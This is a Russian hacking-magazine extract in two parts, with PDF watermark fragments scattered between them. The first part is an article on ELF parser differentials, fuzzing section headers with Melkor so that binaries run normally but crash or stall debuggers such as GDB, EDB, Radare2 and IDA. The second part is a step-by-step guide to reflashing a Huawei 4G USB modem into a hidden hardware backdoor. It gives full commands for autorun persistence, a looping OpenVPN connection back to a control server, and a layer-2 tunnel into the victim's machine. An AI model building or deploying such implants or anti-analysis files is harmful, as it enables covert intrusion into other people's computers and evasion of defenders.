Первое упоминание атаки с таким именем нашлось в презентации 2010 года Мередит Паттерсон и Лена Сассамана, посвященной грамматикам протоколов. Там была рассмотрена атака, именуемая arse tree di erential attack — что-то типа «атаки на разность деревьев разбора», на парсеры X.509. О ней мы поговорим чуть ниже.
Вработе Security Applications of Formal Language Theory, опубликованной
в2013 году, авторы рассматривают непосредственно саму атаку уже более подробно.
Насколько я могу судить, термин parser differentials, несмотря на то что существует больше десяти лет, не особо в ходу за пределами langsec-сообщества, хотя описаний атак, которые можно сюда отнести, предостаточно. Также мне не попадались варианты перевода этого на русский, но, думаю, можно назвать это чем-то вроде «разности разбора».
Атаки на «разность деревьев разбора» — по-своему удивительный вид атак. Сама идея их максимально простая: имеется две реализации парсеров одного формата, и они по-разному «видят» одни и те же входные данные. Последствия же, особенно в цепочке с другими уязвимостями, могут быть самыми разными. Давай разберем несколько примеров.
REQUESTS SMUGGLING Â GITLAB È ZOOM
HTTP requests smuggling, который в русскоязычных источниках иногда называют «контрабандой запросов», по сути можно отнести к атакам на parser di erential. Они работают за счет того, что два сервера по-разному парсят один и тот же проходящий через них HTTP-запрос. На одних и тех же входных данных они видят разное, что позволяет «контрабандой» внедрять в один запрос второй. С примером такой атаки ты можешь ознакомиться в разборе одной из HTB-тачек.
Эта уязвимость, CVE-2020-6833, существовала в GitLab: gitlabworkhorse и gitlab-rails распарсивали по-разному один и тот же HTTPзапрос на сохранение файла. Эксплуатация уязвимости позволяла файлы читать. Подробнее это было разобрано в блоге GitLab.
Но requests smuggling не ограничивается HTTP-запросами. В докладе
XMPP Stanza Smuggling or How I Hacked Zoom Айван Фратрик из Project Zero
рассказывает о CVE-2022-22784, в которой ошибки парсеров позволяли вставлять теги в сообщения (stanza). Потенциально это позволяло достичь подделки сообщений сервера, перенаправления соединения и проблем с повреждением памяти, недоступных иным путем. Исследователь смог раскрутить это до выполнения своего кода в ходе автообновления Zoom в результате подмены сервера.
Psychic Paper è CVE-2022-42855
В январе этого года был опубликован ресерч того же исследователя из Project Zero. В нем он упоминал вариацию Psychic Paper — атаку, в результате которой на macOS можно было исполнять файлы с неподписанными разрешениями (entitlements) так, что сама система считала, что все окей. Происходило это потому, что внутри операционки парсеров PLIST (то есть старого доброго XML) было аж четыре штуки, которые, конечно же, в определенных случаях не выдавали идеально одинаковые результаты. Невероятным решением той проблемы стало — что бы вы подумали? — создание пятого парсера.
В дальнейшем, впрочем, в Apple решили переходить на бинарный DERформат вместо текстового XML, но и в этом случае Фратрик смог найти в libCoreEntitlements функции, которые парсят элементы DER по-разному, хотя добиться эффекта Psychic Paper ему не удалось.
Доверенные сертификаты X.509 на произвольный домен
В 2010 году Леном Сассаманом и Мередит Паттерсон в докладе Towards a formal theory of computer insecurity: a language-theoretic approach была опи-
сана уже упомянутая атака на обработку сертификатов X.509 браузерами: те могли отображать пользователю не тот домен, для которого сертификаты были изданы, потому что неверно распарсивали поле CN (Common Name), если в нем был нуль-терминатор.
Центр сертификации не позволил бы запросить сертификат для условного www.bank.com тому, кто не владеет таким доменом. Но что случится, спросили исследователи, если в CN указать www.bank.com\x00badguy.com?
Слайд из презентации Сассамана и Паттерсон
Из-за некорректной обработки нуль-терминатора браузеры «видели» и показывали пользователю строку www.bank.com, хотя сертификат (подписанный доверенным центром!) был выдан на совсем другой домен. Такое непотребство, утверждают в докладе, не было бы возможным, если бы âñå реализации парсили поле одним и тем же образом.
ELF: запустить нельзя проанализировать
Собственно, схожей логикой с описанной выше руководствовался некто Алехандро Эрнандез из IOactive, он же nitr0us. В далеком ныне 2012 году он решил поискать варианты воспрепятствовать анализу бинарей более интересным способом, чем использование методов runtime-антиотладки, которые все же можно обходить. В GDB того времени (7.5.1) nitr0us нашел багу в обработке DWARF, когда при попытке загрузить специально сформированный эльф в отладчик последний падал на разыменовании нулевого указателя.
Помимо GDB, nitr0us нашел тогда багу в IDA Pro 6.3, приводящую к внутренней ошибке, после которой та закрывается, опять же не давая проанализировать файл. Сам эльф при этом, конечно, прекрасно запускался самой ОС и работал. Подробнее можешь ознакомиться в посте IOactive Striking Back GDB and IDA debuggers through malformed ELF executables.
ПАРСЕРЫ ELF
Теперь, когда мы имеем некоторое представление о том, что в мире парсеров не все хорошо, подойдем ближе к сабжу и посмотрим, как обстоят дела с ELF. Задумывался ли ты, сколько в системе с Linux можно насчитать парсеров одного только ELF-формата?
ßäðî ÎÑ
Парсер ELF есть в ядре Linux и других ОС, которые умеют с ним работать. Он отвечает за то, чтобы такие системные вызовы, как execve()/execveat(), могли выполнить свою работу, а мы могли запускать свои любимые браузеры и смотреть видео с котиками читать статеечки.
Здесь происходит много работы, но в целом ядро выполняет примерно следующее:
•проверяет наличие прав на запуск файла;
•проверяет, поддерживается ли формат в качестве исполняемого;
•в зависимости от формата выбирает так называемый интерпретатор. В случае динамически слинкованных эльфов это ld, а в случае скриптов,
которые начинаются с шебанга (#!), это то, что указано в первой строке (/ bin/sh, /usr/bin/env python3 и вообще любой путь — можешь поэкспериментировать на досуге);
•в случае эльфов подготавливает сегменты памяти в соответствии с тем, что указано в его программных заголовках;
•а если эльф динамический, то надо не забыть подгрузить все необходимые библиотеки, которые также являются эльфами (для них выполняются те же шаги);
•устанавливает указатель текущей инструкции процесса, вызвавшего execve*(), на точку входа.
Дампы памяти, появляющиеся в Linux при вызове, например, abort() или получении SIGABRT, возникают тоже не из воздуха: их ядро любезно
собирает в ELF-файл, который имеет тип ET_CORE вместо ET_EXEC/ET_DYN.
И казалось бы, механизм запуска пользовательских бинарей в ОС должен быть хорошо отлажен за не одно десятилетие существования формата — первая спецификация появилась аж в 1989 году еще для Unix System V. Ан нет! Уже известными нам IOActive в 2014 была выявлена проблема в OpenBSD 5.5, позволяющая вызвать панику ядра специально сформированным файлом.
Системные утилиты
Здесь можно назвать ряд системных утилит из binutils, среди которых readelf, objdump, as, gcc и ld. Под капотом у них разбором ELF заведует GNU BFD Library, то есть можно сказать, что на нижнем уровне парсер один. Но там, где включается логика самих утилит, могут проявиться различия.
Отладчики, декомпиляторы, дизассемблеры, эмуляторы
Когда ты хочешь отладить какой-нибудь эльф, скажем в GDB, он пройдет минимум через два парсера: парсер отладчика, чтобы, к примеру, подгрузить доступные символы из файла или отладочную информацию при наличии таковой, и парсер ядра, чтобы этот эльф запустить. Если ты используешь расширения, то в игру может включиться что-нибудь еще — например, в случае pwndbg это elftools.
Различные инструменты анализа, будь то IDA, Ghidra, Radare2 или rizin, также вынуждены парсить заголовки файлов, чтобы иметь возможность показать тебе точку входа, сегменты и при возможности красиво поименовать функции и переменные. В angr загрузкой исполняемых файлов занимается CLE, внутри использующий elftools. В LIEF за это отвечает собственный код.
Помимо этого, исполняемые файлы в ходе анализа парсят антивирусные движки, иногда допуская занятные курьезы в виде исключения из дальнейшей проверки целой архитектуры.
Продолжение статьи →
|
|
|
hang |
e |
|
|
|
|
||
|
|
C |
|
|
E |
|
|
|||
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
wClick |
|
c |
|
o m |
COVERSTORY |
||||
|
|
|
|
|
|
|||||
|
|
|
to |
BUY |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
.c |
|
||
|
. |
|
|
|
|
|
|
|
||
|
p |
|
|
|
|
|
g |
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
← НАЧАЛО СТАТЬИw Click |
|
BUY |
|
m |
||||||
to |
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
УЧИМ ИСПОЛНЯЕМЫЕ ФАЙЛЫ LINUX СОПРОТИВЛЯТЬСЯ ОТЛАДКЕ
ИЩЕМ РАЗЛИЧИЯ
Как видишь, парсеров много. Как же подступиться к поиску parser di erential между ОС и приложениями, когда имеется столько инструментов, на которые можно нацелиться? Как и всегда, определимся сперва с тем, чего мы хотим. Наибольший интерес представляет для нас эльф, который запускается операционной системой и при этом не открывается в отладчике и дизассемблерах.
Известно, что для запуска и работы эльфа информация о секциях совершенно не нужна, и ОС на нее спокойно забивает — об этом, если интересно, было написано в моей прошлой статье. Инструменты анализа, напротив, ее используют, когда пытаются вычитать имена символов и секций в файле. Это значит, что следует сосредоточить внимание на фаззинге заголовков секций.
Хочу подчеркнуть, что моей целью не был поиск зиродеев в инструментах, мне хотелось разобраться с тем, как их в принципе можно тестировать пачкой эльфов. Поэтому и выборка будет не очень большой.
Фаззеры
Пофаззить эльфы, как и любой другой формат, можно по-разному. Пойдем от самого простого.
LiveOver ow написал скрипт, который всего лишь устанавливает один случайный байт из файла в случайное значение и вот таким нехитрым образом получает работающий файл, не открывающийся в GDB и Radare2. Самое интересное в этом всем то, что в 2020 году схожим фаззером нашли пару проблем в Radare2 при обработке заголовков PE и ELF. Этим уязвимостям присвоили идентификаторы CVE-2020-16269 и CVE-2020-17487.
Другой возможный вариант — воспользоваться AFL++. Это, несомненно, куда лучше слепого перебора случайных байтов и позволяет отслеживать покрытие в тестируемой программе. Но нам-то хорошо бы использовать пачку разных инструментов на одинаковом наборе эльфов и найти среди них такой, который поломает их все, но запустится на системе. А это не совсем тот юзкейс, на который ориентирован AFL++.
К тому же, если мы знаем, какой именно из парсеров эльфов мы хотим пофаззить (а точнее, на что в файле обращает внимание тестируемый парсер), то неплохо иметь возможность уточнить задачу фаззеру. Хотим ли мы портить программные заголовки (PHT, Program Header Table), заголовки секций (SHT, Section Header Table), собственный заголовок эльфа или, может, все вместе? Звучит так, будто лучше использовать фаззер с описанием грамматик. Но это — отдельная непростая тема, далеко выходящая за рамки сегодняшней статьи. Исходя из того, чего мы хотим в нашей задаче, нужно ломать в эльфе заголовки секций, а не все подряд.
И к счастью, для этого есть более подходящий фаззер.
Melkor
Он был создан уже знакомым нам nitr0us специально для получения сломанных разным (в зависимости от задачи) образом эльфов и носит гордое имя Melkor. Несмотря на свой возраст, у меня он практически без проблем собрался и заработал, да и формат-то за минувшее время не изменился. Из ограничений Melkor могу выделить поддержку исключительно архитектуры x86 (32/64 бит).
В репозитории есть пара шаблонных эльфов, которые можно использовать как вход для фаззинга. Можно указать, какие именно заголовки во входном эльфе ты хочешь пофаззить: PHT, SHT, таблицу символов, релокаций и прочее, что очень удобно, если знаешь, что именно тебе нужно.
Опции Melkor
Итак, укажем «Мелькору» при генерации эльфов фаззить лишь заголовки секций в шаблонном файле foo из папки templates. Они будут сохранены в пап-
ке orcs_foo/.
Портим эльфов
Хочу отметить другое удобство в этом фаззере — наличие готового скрипта test_fuzzed.sh, которым можно прогнать пачку сгенерированных файлов на тестируемом инструменте, будь то ОС или какой-нибудь отладчик. Позапускаем получившиеся эльфы в системе командой ./test_fuzzed.sh orcs_foo/ | tee test_OS. Большинство запустились и завершились без ошибок. Но некоторые, что интересно, завершились с сегфолтом, но они в рамках решаемой задачи меня не интересовали.
Сегфолты при запуске на системе
Тестируем EDB
Посмотрим, как себя почувствуют отладчики. На «плохих» файлах они будут выводить сообщения об ошибках и ждать указаний пользователя, что не очень удобно, когда анализируешь поведение на большом количестве файлов. Тут можно схитрить: чтобы не закрывать отладчик руками каждый раз, будем запускать его через команду timeout, которая завершит выполнение тесткейса за нас, а мы пока сможем откинуться на спинку кресла.
На первых двух эльфах EDB (1.3.0) споткнулся, а на третьем запустился, предлагая отладить файл, но закрылся по тайм-ауту, и тестирование продолжилось. Красота!
Прогоняем запуск эльфов в EDB
Всего на сотню покоррапченных эльфов в EDB мы получили 55 сегфолтов и 9 исключений с делением на ноль (да-да, SIGFPE, или Floating point exception, несмотря на свое название, в Linux генерируется и при целочисленном делении на ноль).
Падения EDB
Дальнейшие разбирательства, подарившие мне уникальный опыт отладки отладчика в другом отладчике, показали, что эти проблемы возникают в плагине BinaryInfo. Он отвечает за парсинг секций для сбора информации о символах перед тем, как непосредственно запустить исследуемый эльф для отладки. В первом случае не проверялась валидность указателя на строку с именем секции и он спокойно мог указывать за пределы прочитанного файла. Во втором отсутствовала проверка размера элемента перед тем, как подсчитывать их количество в секциях, содержащих таблицы элементов (такие как таблица символов).
Если тебе вдруг интересно, оба бага уже пофикшены.
SIGFPE в EDB в результате деления на ноль при подсчете элементов в секции
Кстати говоря, при исследовании падений крайне удобно иметь сборку тестируемого ПО с санитайзерами. Например, собрав EDB с Address Sanitizer (ASAN), мы получим удобный бэктрейс, который приятнее просматривать в логах того же ./test_fuzzed.sh, чем изучать в отладчике каждый кейс руками.
Вывод Address Sanitizer
Проверяем GDB
Поскольку nitr0us тоже тестировал GDB и учел, что он будет ждать пользовательского ввода, если при открытии файла возникнет ошибка, вместо трюка с timeout можно раскомментировать строчку 80 вместо 79-й в ./ test_fuzzed.sh, чтобы было так:
# $2 $1$file 2>&1
echo quit | $2 $1$file 2>&1 # Example: "echo quit | gdb -q orcs/x"
Теперь исполним ./test_fuzzed.sh orcs_foo/ gdb | tee test_gdb.
Прогоняем наших эльфов в GDB
В 98 случаях из 100 GDB отказывался открыть файл с сообщением not in executable format: file format not recognized. В одном случае он сообщил: Can’t read symbols from /home/kali/tmp/edb-segfault/ Melkor_ELF_Fuzzer/orcs_foo/orc_0063: bad value, но один — хоть и с руганью — все же открыл. Зато каких-либо падений, в отличие от EDB, не было.
98 отказов и лишь один запуск
В общем, GDB ведет себя достаточно зрело на нашей сотне сломанных эльфов в том смысле, что хотя бы не падает на них. Другое дело, что он совершенно отказывается с ними работать, и это только на руку тем, кто заинтересован в антиотладке.
Radare2: r2hang
Чтобы автоматизировать анализ файла, запуск дебага и закрытие Radare2 в случае каких-либо проблем, заменим вновь 80-ю строку скрипта ./ test_fuzzed.sh следующей:
echo "aaaa\nood\ndc\nq\n\n" | $2 $1$file 2>&1
Тайм-аут в команде запуска оставим на всякий случай, чтобы на чем-нибудь не застрять. Также отключим цветной вывод опцией -e scr.color=false, чтобы эскейп-последовательности, которыми закодированы цвета, не мешали в дальнейшем изучать лог. После этого запустим тестирование.
Прогоняем эльфов в «Hадаре»
С большинством испорченных эльфов Radare2 справился без особо больших проблем и ни на одном не упал так, как EDB. Он, впрочем, задумывался при попытке начать отладку некоторых файлов, но в итоге все же открывал. Восемь файлов завершались с сегфолтом (при прогоне на ОС их было десять), а завершились с каким-нибудь кодом — то есть таки были запущены для отладки — 65 штук.
Результаты прогона в Radare2
Иными словами, примерно с четвертью файлов возникла какая-то проблема. Чаще всего она заключалась в том, что только на открытии ELF Radare2 зависал, выедая при этом ядро CPU, и завершался по тайм-ауту. Чтобы посмотреть, в недрах чего он виснет, можно приаттачиться к процессу этого приложения.
Radare2 за обедом
Вкратце расследование этой проблемы включало в себя дебажную сборку последней версии из GitHub, проверку, что и на ней также происходит зависание, и построчную отладку Radare2 с подглядыванием в сорцы, изучением бэктрейсов и содержимого структур, описывающих ELF внутри
Radare2.
Для локализации проблемы было также полезно сравнить заголовки эльфа, на котором Radare2 зависает, с оригинальным foo из репозитория Melkor, на базе которого сгенерированы наши 100 файлов. Слева — дифф содержимого их таблиц секций (SHT) в vbindi , а справа — представление этих же данных для одной из секций в Hiew. Итак, Melkor решил создать секцию (конкретно .plt.got) невероятного размера.
Заголовки, сломанные при помощи Melkor, в vbindi и Hiew
Сама же проблема, как выяснилось, заключалась в отсутствии одной проверки, когда парсер ELF в Radare2 проходился по элементам секции .plt.got, пытаясь найти в ней смещение символа plt_addr. Не проверялось, умещается ли вообще в пределы файла секция заявленного в заголовках ELF размера (Physical size в Hiew на скриншоте выше). Таким образом, Radare2 в цикле итерировался по файлу от начала .plt.got (в нашем случае 0x10f0) до места, где, как он считал, находится ее конец согласно заголовкам в таблице секций (а это очень большое число в рассматриваемом примере). Для выхода из этого цикла нужно всего лишь пройтись по примерно следующему количеству элементов:
0x4242424258aebf0b/8 = 596806425961158625
Этот баг, к слову, тоже был пофикшен.
Надо сказать, что собственно чтения за пределами буфера, хранящего содержимое ELF-файла (что потенциально могло бы вылиться в сегфолт при выходе за пределы маппинга), не происходило, поскольку в вызываемых в дальнейшем функциях присутствовали нужные проверки. В результате, подойдя к концу буфера, Radare2 просто читал по 0 байт, пока не выполнялось условие выхода: проитерировать всю секцию по ее размеру.
Докапываемся до истины: чтение по 0 байт в конце буфера с содержимым файла
Interactive Disassembler
Последним инструментом, который мы рассмотрим, будет IDA. Тестировать ее автор Melkor предлагает с помощью его батника win_test_fuzzed.bat, однако тут нас встречает одно крохотное неудобство: как он указывает в своем ресерче, закрывать появляющиеся окошки придется руками. Что ж, нехотя с этим смиримся.
Nitr0us фаззил демоверсию «Иды», мы же испробуем IDA Free 8.2 для Linux. В случае появления окон с ошибками будем действовать так, как среднестатистический пользователь: не думая соглашаться со всем.
В целом IDA весьма неплохо себя чувствовала. В ней есть проверка смещений и размеров секций, их пересечений, валидности атрибутов и соответствующая обработка невалидных значений. Однако же нашлись эльфы, оказавшиеся ей не по зубам. В одном из файлов она некорректно отображает содержимое секций в сегменты, выводя крайне странную точку входа, да и список доступных сегментов тоже оставляет множество вопросов. ELF при этом успешно запускается через F9 для отладки и завершается с кодом 0.
Некорректное отображение точки входа и сегментов
Более того: можно поставить точку останова в точке входа (и пусть тебя нисколько не смущает ее вид!), и при отладке IDA действительно остановится на старте бинаря, а при нажатии на F7 (single step) еще и предложит перевести данные в код.
Предложение IDA пересоздать инструкцию
Что интересно — если согласиться с этим предложением, нашему взору предстанет что-то подозрительно похожее на подготовку регистров с вызовом __libc_start_main().
Точка входа
Всего эльфов с таким поведением IDA обнаружила 2 из 100.
ВЫВОДЫ
Однажды мне сказал один мудрец: первое и главное, что необходимо сделать, когда хочется что-то сломать, — осознать поверхность атаки. Интересно, как всего лишь сотни поломанных эльфов оказалось достаточно, чтобы проэксплуатировать parser di erential в различных инструментах и предотвратить анализ рабочих файлов, когда знаешь, на что обращать внимание.
Всевозможные парсеры чего угодно — настоящее поле для экспериментов. Реализации стандартов содержат ошибки и не парсят одинаково, а в форматах часто присутствует избыточная информация. Пример тому — информация о секциях ELF, благодаря чему одни и те же файлы прекрасно запускаются ОС, игнорирующей ее, но не анализируются инструментами, так или иначе полагающимися на эти данные. Лейтмотив всего langsec’а тому подтверждение:
Ambiguity is insecurity.
Как мы увидели, проще всего было сделать так, чтобы GDB отказался анализировать файл. Мы смогли заставить упасть EDB и зависнуть Radare2. IDA же, хоть и могла открыть большинство бинарей, на двух выдала откровенную чушь.
В EDB и Radare2 были локализованы и пофикшены найденные баги. Я считаю, это неплохой результат для ресерча, который начался с восьмиминутного видео!
Если тебе интересно более основательно поковы-
ряться с ломанием инструментов |
для работы |
с ELF-файлами, предлагаю тебе |
ознакомиться |
со следующими источниками, не считая уже перечисленных в тексте:
•tmp.out — ezine, посвященный эльфам и реверсу, и их репозиторий с огромным списком ссылок по теме;
•репозиторий elfmaster (Ryan O’Neill), гуру эльфов;
•PoC||GTFO — что-то типа сборника статей о форматах файлов, протоколов, их внутренностях, реверсе и эксплуатации,
или Emulation, vintage computing, modern heap corruption exploitation, systems internals, and everything in between;
•How programs get run: ELF binaries [LWN.net];
•How does the Linux kernel run a program и другие статьи по Linux от 0xAX;
•вайтпейпер “Weird Machines” in ELF: A Spotlight on the Underappreciated Metadata.
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
r |
|
P |
|
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
|
||||
w Click |
|
BUY |
|
o m |
ВЗЛОМ |
|||||||
to |
|
|
|
|
||||||||
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
|
c |
|
|
|
. |
|
|
|
|
|
. |
|
|
|||
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
|
df |
-x |
|
n |
e |
|
|
|||
|
|
|
|
ha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
i |
r |
|
P |
|
|
|
|
|
NOW! |
o |
||||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
c |
|
|
|
c |
|
||
|
. |
|
|
|
|
. |
|
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
||
|
|
|
|
-x ha |
|
|
|
|
|
ЗАКРЕПЛЯЕМСЯ В АТАКОВАННОЙ СИСТЕМЕ ПРИ ПОМОЩИ USB-МОДЕМА
Если у злоумышленника есть непосредственный доступ к компьютеру потенциальной жертвы, он может обеспечить себе постоянный и бесперебойный канал связи. Проще всего использовать для этого обычный USB-модем, который предварительно следует слегка модифицировать. В этой статье мы подробно расскажем и покажем как.
s0i37
Lead cybersecurity analyst at USSC t.me/s0i37_channel s0i37@ya.ru
Что, если кто-нибудь воспользуется оставленным без внимания компьютером и подключит к нему специальный девайс, по которому затем получит удален- ный доступ из любого уголка мира? Вся описанная мною ранее магия с эмуляцией устройств через USB может оказаться в распоряжении злоумыш- ленника. Только теперь он направит усилия не на атаку, а на поддержание удаленного доступа.
Эта статья — часть серии публикаций о практических приемах взлома и атак с использованием подручных устройств, которые можно собрать дома. В этих материалах мы раскрываем простые способы получения несанкционированного доступа к защищенной информации и показываем, как ее оградить от подобных атак. Предыдущая статья серии: «Злая сетевуха. Разбираем в деталях атаку BadUSB-ETH».
Задумывался ли ты о том, что современные 4G-модемы (HiLink) — это устройства чуть больше флешки с настоящим Linux внутри? Например, Android 2.3 / Linux 3.4.5 + VxWorks v6.8 для GSM. Это полностью автономные устройства
спитанием по USB. Сразу после подключения к компьютеру ОС модема за несколько секунд загружается и эмулирует свой USB как сетевую карту.
Для описываемой в этой статье атаки лучшим аппаратным решением будет непосредственно сам HiLink-модем: он компактен и имеет 4G-модуль. Это может быть, например, популярный Huawei E3372h-153, который позволяет сделать перепрошивку, к тому же у него богатая поддержка сообществом энтузиастов.
Современные 4G-модемы представляют собой HiLink-модемы, то есть они определяются в системе как сетевая карта. Для ОС ПК пользователя максимально удобно взаимодействовать с интернетом через такую виртуальную Ethernet-сеть. Но в то же время и сам модем может использоваться для взаимодействия с компьютером, к которому он подключен. Внутри модема работает полноценная ОС, которая так же, как было продемонстрировано
сBadUSB-ETH, эмулирует сетевую карту. Схема закрепления на скомпрометированной машине при помощи такого устройства показана на следующем рисунке.
Информационные потоки при закреплении по USB
Для закрепления в похожих обстоятельствах существует готовый девайс под названием LAN Turtle, однако он лишен важной особенности — поддержки стороннего 4G-канала.
РЕАЛИЗАЦИЯ
Само устройство настолько удачно подходит для организации удаленного доступа, что понадобится минимум изменений. Его главные преимущества:
•не требует дополнительного питания;
•скрытое подключение, устройство не будет видно в локальной сети, так как работает только в пределах скомпрометированного компьютера;
•автономный канал передачи данных 4G позволит иметь доступ даже внутри изолированных локальных сетей.
Для максимальной эффективности устройство потребуется немного доработать — перепрошить модем. После всех внесенных изменений ОС модема автоматически установит VPN-соединение с контрольным сервером через 4G-сеть (внешний канал) и обеспечит таким образом устойчивый сетевой доступ к ПК, в который вставлен модем. Изначально получить доступ к ОС модема можно одним из следующих способов:
telnet 192.168.8.1
adb connect 192.168.8.1:5555
Чтобы выполнить дальнейшие настройки, потребуется включить порты для ATкоманд:
curl http://192.168.8.1/html/switchDebugMode.html
minicom -D /dev/ttyUSB0
После включения отладочного режима ОС модема может быть модифицирована, для этого нужно войти в режим перепрошивки и загрузить открытую прошивку:
at^godload |
# Переход в |
режим прошивки. Модем |
перезагрузится |
|
|
sudo ./balong_flash -p /dev/ttyUSB0 |
E3372h-153_Update_22.200.15.00. |
|
00_M_AT_05.10_nv.exe |
|
|
После запуска модем обычно эмулирует CD-ROM с драйверами плюс SDкарту. Это нужно отключить, поскольку девайсу требуется только эмуляция сети:
AT^NVWREX=50091,0,60,1 0 0 0 FF 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A3
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 |
|
# Не переходить в режим CD-ROM при запуске, |
включен |
RNDIS/CDC |
|
AT^RESET |
# Перезагрузка |
Далее следует модифицировать сервер DHCP, чтобы модем не объявлял себя шлюзом и на компьютере не ломалась таблица маршрутизации. Модем должен подключаться максимально скрытно:
cat <<EE > /data/config
Interface br0
MinLease 30
Vendorid c0012
Address main
EnbSrv 1
Start 192.168.8.100
End 192.168.8.200
Option lease 86400
Option subnet 255.255.255.0
Address main end
EE
Теперь нужно скопировать на модем клиент OpenVPN с драйвером и кон- фигом. Чтобы ничего не компилировать, готовые бинарники можно скачать с сайта 4PDA:
adb push tun.ko /online/ovpn/
adb push openvpn /online/ovpn/
adb push vds.ovpn /online/ovpn/
cat <<EE > /data/vpn.sh
#!/system/bin/busybox sh
while :; do /online/ovpn/openvpn --config /online/ovpn/vds.ovpn
--route-noexec; done
EE
chmod 700 /data/vpn.sh
busybox passwd
reboot
Для большей надежности обратного подключения VPN лучше запускать в бесконечном цикле. Осталось лишь настроить автозапуск всего этого добра и не забыть организовать маршрутизацию пакетов через модем от 4Gсети в сторону целевого компьютера:
mount -o remount,rw /dev/block/mtdblock16
cat <<EE >> /system/etc/autorun.sh
/data/autorun.sh &
EE
cat <<EE > /data/autorun.sh
#!/system/bin/busybox sh
killall dhcps.real
cp /data/config /var/dhcp/dhcps/config
dhcps.real &
sleep 5
insmod /online/ovpn/tun.ko
/data/vpn.sh &
iptables -t nat -A POSTROUTING -o br0 -s 172.16.0.0/24 -j MASQUERADE
iptables -I INPUT 1 -i br0 -p tcp --dport 80 -j DROP
iptables -I FORWARD 2 -i br0 -o wan0 -j DROP
EE
chmod 700 /data/autorun.sh
Также на модеме запрещен выход в 4G-интернет с ПК и прикрыта веб-админка. Теперь модем полностью «заряжен» и готов к использованию в качестве аппаратной закладки.
ЗАКРЕПЛЕНИЕ
В результате аппаратный бэкдор может выглядеть примерно так.
Подключение аппаратной закладки к ПК
Достаточно неприметно, не правда ли? Просто какая-то большая флешка, подумает рядовой пользователь. Если у злоумышленника есть возможность добраться до USB-порта компьютера, то мало кто сразу заметит столь «странное» устройство. Это обеспечит потенциальному злоумышленнику длительный сетевой доступ к цели по автономному каналу. Заметь, что тут используется именно сторонний канал для удаленного подключения, так что больше не требуется выход в интернет из внутренней сети. Канал мобильной сети предоставляет злоумышленнику гарантированный удаленный доступ.
Получение сетевого доступа к ПК через аппаратную закладку
Телефон и LAN Turtle подключены к одному и тому же серверу VPN, который связывает их сетевой трафик. 4G-модем перенастроен так, чтобы пропускать трафик в нехарактерном обратном направлении — через себя в сторону компьютера, подобно шлюзу. Даже на расстоянии тысяч километров у злоумышленника будет прямой сетевой доступ к скомпрометированной машине.
Впредставленном примере телефон и ноутбук никак не связаны напрямую
иработают в разных сетях. Ноутбук — в локальной сети по проводу без интернета, а телефон — по 4G. Но после добавления маршрута до компьютера жертвы через 4G-модем телефон атакующего получает удаленный доступ к ПК.
L2-ДОСТУП
Подобный способ закрепления дает сетевой доступ только до машины, к которой подключен модем. Дальнейшие действия атакующего сопряжены с необходимостью получить логический доступ, то есть взломать систему и управлять ей. В случае успеха это дает как контроль над самим компьютером, так и возможность идти дальше — вглубь локальной сети. Чтобы атаковать целевую систему было проще, может потребоваться организовать более близкий к цели L2VPN-туннель.
Необходимо пробросить еще один VPN-туннель внутри уже имеющегося. Если первый VPN использовался исключительно для связи с устройством lan_turtle, то второй дает максимально возможный сетевой доступ до компьютера через эмулированную по USB сеть.
Для этого внутри USB-модема нужно выполнить еще несколько команд, которые создадут VPN-туннель и поместят новоиспеченный виртуальный интерфейс в сетевой мост с USB-интерфейсом:
./openvpn --config l2.ovpn --route-noexec
brctl addif br0 tap1
ifconfig tap1 0
Здесь конфигурационный файл может быть создан прямо внутри модема примерно со следующим содержимым:
l2.ovpn lclient
proto tcp
dev tap
remote 172.16.0.10 1194
<ca>
</ca>
<cert>
</cert>
<key>
</key>
keepalive 10 60
persist-key
persist-tun
